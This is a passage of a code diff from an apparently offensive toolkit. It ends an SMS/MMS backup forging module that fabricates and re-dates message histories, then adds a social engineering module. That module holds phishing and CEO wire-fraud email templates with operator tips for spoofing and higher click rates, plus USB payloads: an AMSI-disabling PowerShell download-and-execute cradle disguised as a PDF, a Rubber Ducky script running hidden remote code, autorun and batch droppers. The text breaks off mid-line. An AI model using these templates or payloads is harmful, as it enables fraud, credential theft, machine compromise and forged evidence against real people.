tmpl['description'], + 'variables': tmpl.get('variables', []), + 'message_count': len(tmpl.get('messages', [])), + 'messages': tmpl.get('messages', []), + 'builtin': True, + } + for key, tmpl in self._custom_templates.items(): + templates[key] = { + 'name': tmpl.get('name', key), + 'description': tmpl.get('description', ''), + 
'variables': tmpl.get('variables', []), + 'message_count': len(tmpl.get('messages', [])), + 'messages': tmpl.get('messages', []), + 'builtin': False, + } + return templates + + def save_custom_template(self, key: str, template: Dict[str, Any]) -> Dict[str, Any]: + """Save a custom template.""" + self._custom_templates[key] = template + self._save_custom_templates() + return {'ok': True, 'key': key} + + def delete_custom_template(self, key: str) -> Dict[str, Any]: + """Delete a custom template.""" + if key in self._custom_templates: + del self._custom_templates[key] + self._save_custom_templates() + return {'ok': True} + return {'ok': False, 'error': f'Template not found: {key}'} + + def _get_template(self, name: str) -> Optional[Dict[str, Any]]: + """Look up a template by name from built-in and custom templates.""" + if name in BUILTIN_TEMPLATES: + return BUILTIN_TEMPLATES[name] + if name in self._custom_templates: + return self._custom_templates[name] + return None + + def _load_custom_templates(self): + """Load custom templates from disk.""" + tmpl_file = self._data_dir / 'custom_templates.json' + if tmpl_file.exists(): + try: + self._custom_templates = json.loads(tmpl_file.read_text('utf-8')) + except Exception: + self._custom_templates = {} + + def _save_custom_templates(self): + """Persist custom templates to disk.""" + tmpl_file = self._data_dir / 'custom_templates.json' + tmpl_file.write_text(json.dumps(self._custom_templates, indent=2), encoding='utf-8') + + # ── Export / Import ───────────────────────────────────────────────────── + + def export_xml(self, path: str) -> Dict[str, Any]: + """Export current messages to SMS Backup & Restore XML format.""" + return self.save_backup(path) + + def import_xml(self, path: str) -> Dict[str, Any]: + """Import messages from an XML backup file (appends to current messages).""" + old_messages = list(self._messages) + old_backup_set = self._backup_set + old_backup_date = self._backup_date + result = 
self.load_backup(path) + if result.get('ok'): + new_messages = list(self._messages) + self._messages = old_messages + new_messages + self._backup_set = old_backup_set + self._backup_date = old_backup_date + result['added'] = len(new_messages) + result['total'] = len(self._messages) + else: + self._messages = old_messages + self._backup_set = old_backup_set + self._backup_date = old_backup_date + return result + + def export_csv(self, path: str) -> Dict[str, Any]: + """Export current messages to CSV format.""" + try: + out = Path(path) + out.parent.mkdir(parents=True, exist_ok=True) + with open(str(out), 'w', encoding='utf-8', newline='') as f: + writer = csv.writer(f) + writer.writerow(['address', 'body', 'type', 'timestamp', + 'contact_name', 'readable_date', 'msg_kind']) + for msg in self._messages: + body = msg.get('body', '') + if msg.get('msg_kind') == 'mms' and not body: + for part in msg.get('parts', []): + if part.get('ct') == 'text/plain' and part.get('text', 'null') != 'null': + body = part['text'] + break + msg_type = msg.get('type', msg.get('msg_box', 1)) + writer.writerow([ + msg.get('address', ''), + body, + msg_type, + msg.get('date', 0), + msg.get('contact_name', ''), + msg.get('readable_date', ''), + msg.get('msg_kind', 'sms'), + ]) + return { + 'ok': True, + 'path': str(out), + 'count': len(self._messages), + 'size': out.stat().st_size, + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def import_csv(self, path: str) -> Dict[str, Any]: + """Import messages from CSV (same format as export_csv).""" + return self.bulk_add(path) + + def validate_backup(self, path: str) -> Dict[str, Any]: + """Validate XML structure matches SMS Backup & Restore format.""" + p = Path(path) + if not p.exists(): + return {'ok': False, 'valid': False, 'error': 'File not found'} + + issues: List[str] = [] + try: + tree = ET.parse(str(p)) + root = tree.getroot() + + if root.tag != 'smses': + issues.append(f'Root element is <{root.tag}>, expected ') + + 
if not root.get('count'): + issues.append('Missing count attribute on ') + else: + declared = int(root.get('count', '0')) + actual = len(list(root)) + if declared != actual: + issues.append(f'Count mismatch: declared {declared}, actual {actual}') + + if not root.get('backup_set'): + issues.append('Missing backup_set attribute') + if not root.get('backup_date'): + issues.append('Missing backup_date attribute') + + sms_req = ['address', 'date', 'type', 'body'] + mms_req = ['date', 'msg_box', 'address'] + + for i, elem in enumerate(root): + if elem.tag == 'sms': + for attr in sms_req: + if elem.get(attr) is None: + issues.append(f'SMS #{i}: missing required attribute "{attr}"') + elif elem.tag == 'mms': + for attr in mms_req: + if elem.get(attr) is None: + issues.append(f'MMS #{i}: missing required attribute "{attr}"') + parts = elem.find('parts') + if parts is None: + issues.append(f'MMS #{i}: missing element') + addrs = elem.find('addrs') + if addrs is None: + issues.append(f'MMS #{i}: missing element') + else: + issues.append(f'Element #{i}: unexpected tag <{elem.tag}>') + + return { + 'ok': True, + 'valid': len(issues) == 0, + 'issues': issues, + 'element_count': len(list(root)), + } + + except ET.ParseError as e: + return {'ok': False, 'valid': False, 'error': f'XML parse error: {e}'} + except Exception as e: + return {'ok': False, 'valid': False, 'error': str(e)} + + # ── XML Builder ───────────────────────────────────────────────────────── + + def _build_xml(self) -> str: + """Build the full XML string in SMS Backup & Restore format.""" + lines = [] + lines.append("") + lines.append('') + + count = len(self._messages) + backup_date = str(self._backup_date) + lines.append( + f'' + ) + + for msg in self._messages: + if msg.get('msg_kind') == 'mms': + lines.append(self._build_mms_element(msg)) + else: + lines.append(self._build_sms_element(msg)) + + lines.append('') + return '\n'.join(lines) + + def _build_sms_element(self, msg: Dict[str, Any]) -> str: + """Build 
a single XML element.""" + attrs = { + 'protocol': str(msg.get('protocol', '0')), + 'address': str(msg.get('address', '')), + 'date': str(msg.get('date', 0)), + 'type': str(msg.get('type', 1)), + 'subject': str(msg.get('subject', 'null')), + 'body': str(msg.get('body', '')), + 'toa': str(msg.get('toa', 'null')), + 'sc_toa': str(msg.get('sc_toa', 'null')), + 'service_center': str(msg.get('service_center', 'null')), + 'read': str(msg.get('read', 1)), + 'status': str(msg.get('status', -1)), + 'locked': str(msg.get('locked', 0)), + 'sub_id': str(msg.get('sub_id', '-1')), + 'readable_date': str(msg.get('readable_date', '')), + 'contact_name': str(msg.get('contact_name', '(Unknown)')), + } + attr_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in attrs.items()) + return f' ' + + def _build_mms_element(self, msg: Dict[str, Any]) -> str: + """Build a single ... XML element.""" + mms_attrs = { + 'date': str(msg.get('date', 0)), + 'ct_t': str(msg.get('ct_t', 'application/vnd.wap.multipart.related')), + 'msg_box': str(msg.get('msg_box', 1)), + 'address': str(msg.get('address', '')), + 'sub': str(msg.get('sub', 'null')), + 'retr_st': str(msg.get('retr_st', 'null')), + 'd_tm': str(msg.get('d_tm', 'null')), + 'exp': str(msg.get('exp', 'null')), + 'locked': str(msg.get('locked', 0)), + 'm_id': str(msg.get('m_id', 'null')), + 'st': str(msg.get('st', 'null')), + 'retr_txt_cs': str(msg.get('retr_txt_cs', 'null')), + 'retr_txt': str(msg.get('retr_txt', 'null')), + 'creator': str(msg.get('creator', 'null')), + 'date_sent': str(msg.get('date_sent', '0')), + 'seen': str(msg.get('seen', 1)), + 'm_size': str(msg.get('m_size', 'null')), + 'rr': str(msg.get('rr', '129')), + 'sub_cs': str(msg.get('sub_cs', 'null')), + 'resp_st': str(msg.get('resp_st', 'null')), + 'ct_cls': str(msg.get('ct_cls', 'null')), + 'm_cls': str(msg.get('m_cls', 'personal')), + 'd_rpt': str(msg.get('d_rpt', '129')), + 'v': str(msg.get('v', '18')), + '_id': str(msg.get('_id', '1')), + 'tr_id': 
str(msg.get('tr_id', 'null')), + 'resp_txt': str(msg.get('resp_txt', 'null')), + 'ct_l': str(msg.get('ct_l', 'null')), + 'm_type': str(msg.get('m_type', '132')), + 'readable_date': str(msg.get('readable_date', '')), + 'contact_name': str(msg.get('contact_name', '(Unknown)')), + 'pri': str(msg.get('pri', '129')), + 'sub_id': str(msg.get('sub_id', '-1')), + 'text_only': str(msg.get('text_only', '0')), + } + attr_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in mms_attrs.items()) + + lines = [f' '] + + # Parts + lines.append(' ') + for part in msg.get('parts', []): + part_attrs = { + 'seq': str(part.get('seq', '0')), + 'ct': str(part.get('ct', 'text/plain')), + 'name': str(part.get('name', 'null')), + 'chset': str(part.get('chset', 'null')), + 'cd': str(part.get('cd', 'null')), + 'fn': str(part.get('fn', 'null')), + 'cid': str(part.get('cid', 'null')), + 'cl': str(part.get('cl', 'null')), + 'ctt_s': str(part.get('ctt_s', 'null')), + 'ctt_t': str(part.get('ctt_t', 'null')), + 'text': str(part.get('text', 'null')), + 'data': str(part.get('data', 'null')), + } + pa_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in part_attrs.items()) + lines.append(f' ') + lines.append(' ') + + # Addrs + lines.append(' ') + for addr in msg.get('addrs', []): + addr_attrs = { + 'address': str(addr.get('address', '')), + 'type': str(addr.get('type', '137')), + 'charset': str(addr.get('charset', '106')), + } + aa_str = ' '.join(f'{k}="{self._escape_xml(v)}"' for k, v in addr_attrs.items()) + lines.append(f' ') + lines.append(' ') + + lines.append(' ') + return '\n'.join(lines) + + # ── Utility ───────────────────────────────────────────────────────────── + + @staticmethod + def _generate_uuid() -> str: + """Generate a backup_set UUID.""" + return str(uuid.uuid4()) + + @staticmethod + def _timestamp_to_readable(ms_timestamp: int) -> str: + """Convert epoch milliseconds to readable date string (SMS Backup & Restore format).""" + try: + dt = datetime.fromtimestamp(ms_timestamp 
/ 1000.0) + # Format: "Mar 1, 2023 12:45:21 PM" + if os.name == 'nt': + return dt.strftime('%b %#d, %Y %#I:%M:%S %p') + return dt.strftime('%b %-d, %Y %-I:%M:%S %p') + except (ValueError, OSError, OverflowError): + return '' + + @staticmethod + def _readable_to_timestamp(readable: str) -> Optional[int]: + """Convert readable date string to epoch milliseconds.""" + formats = [ + '%b %d, %Y %I:%M:%S %p', + '%b %d, %Y %H:%M:%S', + '%Y-%m-%d %H:%M:%S', + '%Y-%m-%dT%H:%M:%S', + '%m/%d/%Y %I:%M:%S %p', + '%m/%d/%Y %H:%M:%S', + ] + for fmt in formats: + try: + dt = datetime.strptime(readable.strip(), fmt) + return int(dt.timestamp() * 1000) + except ValueError: + continue + return None + + @staticmethod + def _escape_xml(text: str) -> str: + """Proper XML attribute escaping.""" + return html.escape(str(text), quote=True) + + @staticmethod + def _encode_attachment(file_path: str) -> str: + """Base64 encode a file for MMS attachment data.""" + with open(file_path, 'rb') as f: + return base64.b64encode(f.read()).decode('ascii') + + def get_messages(self) -> List[Dict[str, Any]]: + """Return a copy of all messages with indices.""" + result = [] + for i, msg in enumerate(self._messages): + m = dict(msg) + m['index'] = i + result.append(m) + return result + + def clear_messages(self): + """Clear all messages from the working set.""" + self._messages = [] + self._backup_set = self._generate_uuid() + self._backup_date = int(time.time() * 1000) + + def get_status(self) -> Dict[str, Any]: + """Module status information.""" + return { + 'ok': True, + 'module': 'sms_forge', + 'version': VERSION, + 'description': DESCRIPTION, + 'message_count': len(self._messages), + 'backup_set': self._backup_set, + 'data_dir': str(self._data_dir), + 'custom_templates': len(self._custom_templates), + } + + def run(self): + """CLI interactive menu for the SMS Forge module.""" + while True: + print("\n" + "=" * 60) + print(" SMS/MMS Backup Forge") + print("=" * 60) + print(f" Messages loaded: 
{len(self._messages)}") + print() + print(" 1. Create new backup") + print(" 2. Load existing backup") + print(" 3. Add SMS message") + print(" 4. Add MMS message") + print(" 5. Add conversation") + print(" 6. Generate from template") + print(" 7. Find messages") + print(" 8. Modify message") + print(" 9. Delete messages") + print(" 10. Replace contact") + print(" 11. Shift timestamps") + print(" 12. Export XML") + print(" 13. Export CSV") + print(" 14. Import CSV (bulk)") + print(" 15. Merge backups") + print(" 16. Validate backup") + print(" 17. View stats") + print(" 18. List templates") + print(" 0. Exit") + print() + + try: + choice = input(" Select: ").strip() + except (EOFError, KeyboardInterrupt): + break + + if choice == '0': + break + elif choice == '1': + self._cli_create_backup() + elif choice == '2': + self._cli_load_backup() + elif choice == '3': + self._cli_add_sms() + elif choice == '4': + self._cli_add_mms() + elif choice == '5': + self._cli_add_conversation() + elif choice == '6': + self._cli_generate_template() + elif choice == '7': + self._cli_find_messages() + elif choice == '8': + self._cli_modify_message() + elif choice == '9': + self._cli_delete_messages() + elif choice == '10': + self._cli_replace_contact() + elif choice == '11': + self._cli_shift_timestamps() + elif choice == '12': + self._cli_export_xml() + elif choice == '13': + self._cli_export_csv() + elif choice == '14': + self._cli_import_csv() + elif choice == '15': + self._cli_merge_backups() + elif choice == '16': + self._cli_validate() + elif choice == '17': + self._cli_stats() + elif choice == '18': + self._cli_list_templates() + else: + print(" Invalid selection.") + + # ── CLI Helpers ───────────────────────────────────────────────────────── + + def _cli_input(self, prompt: str, default: str = '') -> str: + """Read input with optional default.""" + suffix = f' [{default}]' if default else '' + try: + val = input(f' {prompt}{suffix}: ').strip() + return val if val else default 
+ except (EOFError, KeyboardInterrupt): + return default + + def _cli_create_backup(self): + path = self._cli_input('Output path', str(self._data_dir / 'backup.xml')) + result = self.save_backup(path) + if result.get('ok'): + print(f" Backup created: {result['path']} ({result['count']} messages)") + else: + print(f" Error: {result.get('error')}") + + def _cli_load_backup(self): + path = self._cli_input('XML file path') + if not path: + print(" No path provided.") + return + result = self.load_backup(path) + if result.get('ok'): + print(f" Loaded {result['count']} messages") + else: + print(f" Error: {result.get('error')}") + + def _cli_add_sms(self): + address = self._cli_input('Phone number (e.g. +15551234567)') + body = self._cli_input('Message body') + type_str = self._cli_input('Type (1=received, 2=sent)', '1') + contact = self._cli_input('Contact name', '(Unknown)') + result = self.add_sms(address, body, int(type_str), contact_name=contact) + print(f" Added SMS at index {result['index']}") + + def _cli_add_mms(self): + address = self._cli_input('Phone number') + body = self._cli_input('Text body') + box_str = self._cli_input('Msg box (1=received, 2=sent)', '1') + contact = self._cli_input('Contact name', '(Unknown)') + att_path = self._cli_input('Attachment file path (blank for none)') + attachments = [] + if att_path and os.path.isfile(att_path): + ct = self._cli_input('Content type', 'image/jpeg') + attachments.append({ + 'path': att_path, + 'content_type': ct, + 'filename': os.path.basename(att_path), + }) + result = self.add_mms(address, body, attachments, int(box_str), contact_name=contact) + print(f" Added MMS at index {result['index']}") + + def _cli_add_conversation(self): + address = self._cli_input('Phone number') + contact = self._cli_input('Contact name', '(Unknown)') + print(" Enter messages (empty body to finish):") + messages = [] + while True: + body = self._cli_input(f' Message {len(messages) + 1} body') + if not body: + break + type_str = 
self._cli_input(' Type (1=received, 2=sent)', '1') + delay_str = self._cli_input(' Delay (minutes from previous)', '5') + messages.append({ + 'body': body, + 'type': int(type_str), + 'delay_minutes': int(delay_str), + }) + if messages: + result = self.add_conversation(address, contact, messages) + print(f" Added {result['added']} messages") + else: + print(" No messages to add.") + + def _cli_generate_template(self): + templates = self.get_templates() + print(" Available templates:") + for key, tmpl in templates.items(): + print(f" {key}: {tmpl['name']} -- {tmpl['description']}") + name = self._cli_input('Template name') + if name not in templates: + print(" Template not found.") + return + address = self._cli_input('Phone number') + contact = self._cli_input('Contact name') + variables = {} + tmpl = templates[name] + for var in tmpl.get('variables', []): + val = self._cli_input(f' {var}') + variables[var] = val + result = self.generate_conversation(address, contact, name, variables) + if result.get('ok'): + print(f" Generated {result.get('added', 0)} messages") + else: + print(f" Error: {result.get('error')}") + + def _cli_find_messages(self): + address = self._cli_input('Filter by address (blank for all)') + keyword = self._cli_input('Filter by keyword (blank for all)') + results = self.find_messages( + address=address if address else None, + keyword=keyword if keyword else None, + ) + print(f" Found {len(results)} messages:") + for msg in results[:20]: + direction = 'IN' if msg.get('type', msg.get('msg_box', 1)) == 1 else 'OUT' + body = msg.get('body', '')[:60] + print(f" [{msg['index']}] {direction} {msg.get('address', '')}: {body}") + if len(results) > 20: + print(f" ... 
and {len(results) - 20} more") + + def _cli_modify_message(self): + idx_str = self._cli_input('Message index') + if not idx_str: + return + new_body = self._cli_input('New body (blank to skip)') + new_contact = self._cli_input('New contact name (blank to skip)') + result = self.modify_message( + int(idx_str), + new_body=new_body if new_body else None, + new_contact=new_contact if new_contact else None, + ) + if result.get('ok'): + print(" Message modified.") + else: + print(f" Error: {result.get('error')}") + + def _cli_delete_messages(self): + idx_str = self._cli_input('Message indices (comma-separated)') + if not idx_str: + return + indices = [int(x.strip()) for x in idx_str.split(',') if x.strip().isdigit()] + result = self.delete_messages(indices) + print(f" Deleted {result['deleted']} messages, {result['remaining']} remaining.") + + def _cli_replace_contact(self): + old = self._cli_input('Old address') + new = self._cli_input('New address') + name = self._cli_input('New contact name (blank to keep)') + result = self.replace_contact(old, new, name if name else None) + print(f" Updated {result['updated']} messages.") + + def _cli_shift_timestamps(self): + address = self._cli_input('Address (blank for all)') + offset = self._cli_input('Offset in minutes (negative to go back)') + result = self.shift_timestamps( + address if address else None, + int(offset), + ) + print(f" Shifted {result['shifted']} messages by {result['offset_minutes']} minutes.") + + def _cli_export_xml(self): + path = self._cli_input('Output path', str(self._data_dir / 'export.xml')) + result = self.export_xml(path) + if result.get('ok'): + print(f" Exported to {result['path']} ({result['count']} messages, {result['size']} bytes)") + else: + print(f" Error: {result.get('error')}") + + def _cli_export_csv(self): + path = self._cli_input('Output path', str(self._data_dir / 'export.csv')) + result = self.export_csv(path) + if result.get('ok'): + print(f" Exported to {result['path']} 
({result['count']} messages)") + else: + print(f" Error: {result.get('error')}") + + def _cli_import_csv(self): + path = self._cli_input('CSV file path') + if not path: + return + result = self.bulk_add(path) + if result.get('ok'): + print(f" Imported {result['added']} messages") + if result.get('errors'): + for err in result['errors'][:5]: + print(f" Warning: {err}") + else: + print(f" Error: {result.get('error')}") + + def _cli_merge_backups(self): + paths_str = self._cli_input('Backup file paths (comma-separated)') + if not paths_str: + return + paths = [p.strip() for p in paths_str.split(',') if p.strip()] + result = self.merge_backups(paths) + if result.get('ok'): + print(f" Merged: {result['total']} total messages ({result['added']} new)") + if result.get('errors'): + for err in result['errors']: + print(f" Error: {err}") + + def _cli_validate(self): + path = self._cli_input('XML file path') + if not path: + return + result = self.validate_backup(path) + if result.get('valid'): + print(f" Valid backup ({result['element_count']} elements)") + else: + print(" Invalid backup:") + for issue in result.get('issues', []): + print(f" - {issue}") + if result.get('error'): + print(f" Error: {result['error']}") + + def _cli_stats(self): + stats = self.get_backup_stats() + print(f" Total messages: {stats['total']}") + print(f" SMS: {stats['sms_count']}, MMS: {stats['mms_count']}") + print(f" Sent: {stats['sent']}, Received: {stats['received']}") + print(f" Contacts: {len(stats['contacts'])}") + if stats.get('date_range'): + dr = stats['date_range'] + print(f" Date range: {dr['earliest_readable']} -- {dr['latest_readable']}") + for c in stats.get('contacts', [])[:10]: + print(f" {c['address']} ({c['name']}): {c['count']} messages") + + def _cli_list_templates(self): + templates = self.get_templates() + for key, tmpl in templates.items(): + tag = '[builtin]' if tmpl.get('builtin') else '[custom]' + print(f" {key} {tag}: {tmpl['name']}") + print(f" {tmpl['description']}") + 
print(f" Messages: {tmpl['message_count']}, Variables: {', '.join(tmpl.get('variables', []))}") + print() diff --git a/modules/social_eng.py b/modules/social_eng.py new file mode 100644 index 0000000..1f62083 --- /dev/null +++ b/modules/social_eng.py @@ -0,0 +1,1305 @@ +"""AUTARCH Social Engineering Toolkit + +Credential harvesting page cloner, pretexting templates, QR code phishing, +USB drop payloads, vishing scripts, and campaign tracking. +""" + +DESCRIPTION = "Social engineering — phishing, pretexts, QR codes" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "offense" + +import os +import re +import json +import time +import uuid +import base64 +import struct +import hashlib +import threading +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any +from urllib.parse import urljoin, urlparse + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +try: + import requests + REQUESTS_AVAILABLE = True +except ImportError: + requests = None + REQUESTS_AVAILABLE = False + +try: + import qrcode + import io as _io + QRCODE_AVAILABLE = True +except ImportError: + qrcode = None + QRCODE_AVAILABLE = False + + +# ── Pretext Templates ──────────────────────────────────────────────────────── + +PRETEXT_TEMPLATES = { + 'it_support': [ + { + 'name': 'Password Reset', + 'subject': 'Immediate Action Required: Password Reset', + 'body': ( + 'Dear {target_name},\n\n' + 'Our security team has detected unusual activity on your account. ' + 'As a precautionary measure, we require all employees to reset their ' + 'passwords within the next 24 hours.\n\n' + 'Please click the link below to verify your identity and set a new password:\n' + '{link}\n\n' + 'If you did not request this change, please contact the IT Help Desk immediately ' + 'at ext. 4357.\n\n' + 'Best regards,\n' + 'IT Security Team' + ), + 'pretext_notes': 'Urgency + authority. 
Works best when sent from a spoofed IT domain. ' + 'Follow up with a phone call referencing the email for higher success rates.', + }, + { + 'name': 'Security Update Required', + 'subject': 'Critical Security Patch — Action Required by EOD', + 'body': ( + 'Hi {target_name},\n\n' + 'A critical security vulnerability has been identified that affects your workstation. ' + 'IT has prepared an automated patch that must be installed today.\n\n' + 'Please run the update tool at the link below:\n' + '{link}\n\n' + 'Note: You may need to enter your network credentials to authenticate the update.\n\n' + 'Thank you for your cooperation,\n' + 'IT Infrastructure Team' + ), + 'pretext_notes': 'Leverages fear of security breach. Pair with a fake update portal.', + }, + { + 'name': 'VPN Reconfiguration', + 'subject': 'VPN Client Reconfiguration — New Certificate Required', + 'body': ( + 'Dear {target_name},\n\n' + 'Due to our migration to a new security infrastructure, all VPN certificates ' + 'will expire at midnight tonight. To maintain remote access, please download ' + 'the new VPN configuration file:\n' + '{link}\n\n' + 'You will need to authenticate with your current credentials to generate ' + 'a new certificate.\n\n' + 'Questions? Contact the Network Operations Center at noc@{domain}\n\n' + 'Regards,\n' + 'Network Security Team' + ), + 'pretext_notes': 'Effective against remote workers. The VPN config file can be a payload.', + }, + ], + 'hr': [ + { + 'name': 'Benefits Enrollment', + 'subject': 'Open Enrollment Period — Benefits Selection Deadline', + 'body': ( + 'Dear {target_name},\n\n' + 'The annual open enrollment period for employee benefits closes on Friday. 
' + 'If you have not yet made your selections, please log in to the benefits ' + 'portal to review your options:\n' + '{link}\n\n' + 'Failure to complete enrollment by the deadline will result in default ' + 'coverage being applied.\n\n' + 'Human Resources Department' + ), + 'pretext_notes': 'Time pressure on something people care about. High click rates.', + }, + { + 'name': 'Policy Update Acknowledgement', + 'subject': 'Updated Company Policy — Acknowledgement Required', + 'body': ( + 'Dear {target_name},\n\n' + 'Our legal department has updated the Employee Handbook and Acceptable Use Policy. ' + 'All employees are required to review and acknowledge the changes by {deadline}.\n\n' + 'Please read and sign the updated documents here:\n' + '{link}\n\n' + 'Thank you,\n' + 'HR Compliance' + ), + 'pretext_notes': 'Compliance obligation creates urgency. Rarely questioned.', + }, + { + 'name': 'Employee Survey', + 'subject': 'Annual Employee Satisfaction Survey — Your Input Matters', + 'body': ( + 'Hi {target_name},\n\n' + 'We value your feedback! Please take 5 minutes to complete our annual ' + 'employee satisfaction survey. Your responses are anonymous and will help ' + 'shape company improvements.\n\n' + 'Complete the survey here: {link}\n\n' + 'Survey closes {deadline}.\n\n' + 'Thank you,\n' + 'People & Culture Team' + ), + 'pretext_notes': 'Low suspicion — surveys are common. Good for initial reconnaissance.', + }, + ], + 'vendor': [ + { + 'name': 'Invoice Payment', + 'subject': 'Invoice #{invoice_num} — Payment Due', + 'body': ( + 'Dear Accounts Payable,\n\n' + 'Please find attached Invoice #{invoice_num} for services rendered during ' + 'the previous billing period. 
Payment is due within 30 days.\n\n' + 'To view and pay the invoice online:\n' + '{link}\n\n' + 'If you have questions about this invoice, please contact our billing ' + 'department at billing@{vendor_domain}\n\n' + 'Best regards,\n' + '{vendor_name}\n' + 'Accounts Receivable' + ), + 'pretext_notes': 'Target finance/AP departments. Research real vendor names first.', + }, + { + 'name': 'Service Renewal', + 'subject': 'Service Agreement Renewal — Action Required', + 'body': ( + 'Dear {target_name},\n\n' + 'Your {service_name} subscription is due for renewal on {deadline}. ' + 'To avoid service interruption, please review and approve the renewal terms:\n' + '{link}\n\n' + 'Current plan: {plan_name}\n' + 'Renewal amount: ${amount}\n\n' + 'Best regards,\n' + '{vendor_name} Renewals Team' + ), + 'pretext_notes': 'Service disruption fear. Research the target\'s actual vendors.', + }, + { + 'name': 'Account Verification', + 'subject': 'Account Security Verification Required', + 'body': ( + 'Dear {target_name},\n\n' + 'As part of our ongoing security measures, we need to verify your account ' + 'information. Please log in and confirm your details:\n' + '{link}\n\n' + 'If you do not verify within 48 hours, your account may be temporarily suspended.\n\n' + 'Thank you,\n' + '{vendor_name} Security Team' + ), + 'pretext_notes': 'Account suspension threat. Clone the vendor login page for harvesting.', + }, + ], + 'delivery': [ + { + 'name': 'Package Tracking', + 'subject': 'Your Package Has Shipped — Tracking #{tracking_num}', + 'body': ( + 'Your order has been shipped!\n\n' + 'Tracking Number: {tracking_num}\n' + 'Estimated Delivery: {delivery_date}\n\n' + 'Track your package in real-time:\n' + '{link}\n\n' + 'If you did not place this order, click here to report unauthorized activity:\n' + '{link}\n\n' + '{carrier_name} Shipping Notifications' + ), + 'pretext_notes': 'Curiosity + concern about unexpected package. 
High click rates.', + }, + { + 'name': 'Missed Delivery', + 'subject': 'Delivery Attempt Failed — Reschedule Required', + 'body': ( + 'We attempted to deliver your package today but no one was available to sign.\n\n' + 'Tracking: {tracking_num}\n' + 'Attempt: {attempt_date}\n\n' + 'To reschedule delivery or redirect to a pickup location:\n' + '{link}\n\n' + 'Your package will be held for 5 business days before being returned.\n\n' + '{carrier_name} Delivery Services' + ), + 'pretext_notes': 'Fear of missing a delivery. Works broadly across all demographics.', + }, + ], + 'executive': [ + { + 'name': 'CEO Wire Transfer', + 'subject': 'Urgent — Wire Transfer Needed Today', + 'body': ( + 'Hi {target_name},\n\n' + 'I need you to process an urgent wire transfer today. I am in meetings ' + 'all afternoon and cannot handle this myself.\n\n' + 'Amount: ${amount}\n' + 'Recipient: {recipient}\n' + 'Account details are in the attached document: {link}\n\n' + 'Please confirm once completed. This is time-sensitive.\n\n' + 'Thanks,\n' + '{exec_name}\n' + '{exec_title}' + ), + 'pretext_notes': 'Classic BEC/CEO fraud. Requires OSINT on exec names and targets in finance.', + }, + { + 'name': 'Confidential Acquisition', + 'subject': 'Confidential — M&A Due Diligence Documents', + 'body': ( + '{target_name},\n\n' + 'As discussed, I am sharing the preliminary due diligence documents for the ' + 'upcoming acquisition. This is strictly confidential — do not forward.\n\n' + 'Secure document portal: {link}\n\n' + 'Please review before our meeting on {meeting_date}.\n\n' + '{exec_name}\n' + '{exec_title}' + ), + 'pretext_notes': 'Flattery (being included in confidential deal) + authority. 
' + 'Target senior staff who would plausibly be involved.', + }, + ], + 'financial': [ + { + 'name': 'Wire Transfer Confirmation', + 'subject': 'Wire Transfer Confirmation — ${amount}', + 'body': ( + 'Dear {target_name},\n\n' + 'A wire transfer of ${amount} has been initiated from your account.\n\n' + 'Transaction ID: {txn_id}\n' + 'Date: {txn_date}\n' + 'Recipient: {recipient}\n\n' + 'If you authorized this transaction, no action is needed.\n' + 'If you did NOT authorize this transfer, click below immediately:\n' + '{link}\n\n' + '{bank_name} Fraud Prevention' + ), + 'pretext_notes': 'Panic about unauthorized money movement. Very high click rates.', + }, + { + 'name': 'Tax Document', + 'subject': 'Your {tax_year} Tax Documents Are Ready', + 'body': ( + 'Dear {target_name},\n\n' + 'Your {tax_year} W-2 / 1099 tax documents are now available for download ' + 'through our secure portal:\n' + '{link}\n\n' + 'Please retrieve your documents before the filing deadline.\n\n' + 'Payroll Department\n' + '{company_name}' + ), + 'pretext_notes': 'Seasonal — most effective in January-April. 
Targets everyone.', + }, + ], +} + + +# ── USB Payload Templates ──────────────────────────────────────────────────── + +USB_PAYLOAD_TEMPLATES = { + 'autorun': { + 'name': 'Autorun.inf', + 'description': 'Classic autorun — triggers executable on USB insert (legacy systems)', + 'template': ( + '[autorun]\n' + 'open={executable}\n' + 'icon={icon}\n' + 'action=Open folder to view files\n' + 'label={label}\n' + 'shell\\open\\command={executable}\n' + 'shell\\explore\\command={executable}\n' + ), + }, + 'powershell_cradle': { + 'name': 'PowerShell Download Cradle', + 'description': 'PS1 script disguised as document — downloads and executes payload', + 'template': ( + '# Disguise: rename to something enticing like "Salary_Review_2026.pdf.ps1"\n' + '$ErrorActionPreference = "SilentlyContinue"\n' + '# Disable AMSI for this session\n' + '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").' + 'GetField("amsiInitFailed","NonPublic,Static").SetValue($null,$true)\n' + '# Download and execute\n' + '$u = "{payload_url}"\n' + '$c = (New-Object System.Net.WebClient).DownloadString($u)\n' + 'IEX($c)\n' + '# Optional: open a decoy document\n' + '# Start-Process "https://hr.company.com/benefits"\n' + ), + }, + 'hid_script': { + 'name': 'HID Script (Rubber Ducky DuckyScript)', + 'description': 'USB HID attack — keystroke injection via Rubber Ducky / BadUSB', + 'template': ( + 'REM AUTARCH USB HID Payload\n' + 'REM Target: Windows\n' + 'DELAY 1000\n' + 'GUI r\n' + 'DELAY 500\n' + 'STRING powershell -w hidden -ep bypass -c "IEX((New-Object Net.WebClient).DownloadString(\'{payload_url}\'))"\n' + 'DELAY 100\n' + 'ENTER\n' + 'DELAY 2000\n' + 'REM Payload delivered\n' + ), + }, + 'bat_file': { + 'name': 'BAT File Dropper', + 'description': 'Batch file disguised as document shortcut — downloads and runs payload', + 'template': ( + '@echo off\n' + 'title Opening Document...\n' + 'echo Please wait while the document loads...\n' + 'REM Download payload\n' + 'powershell -w hidden 
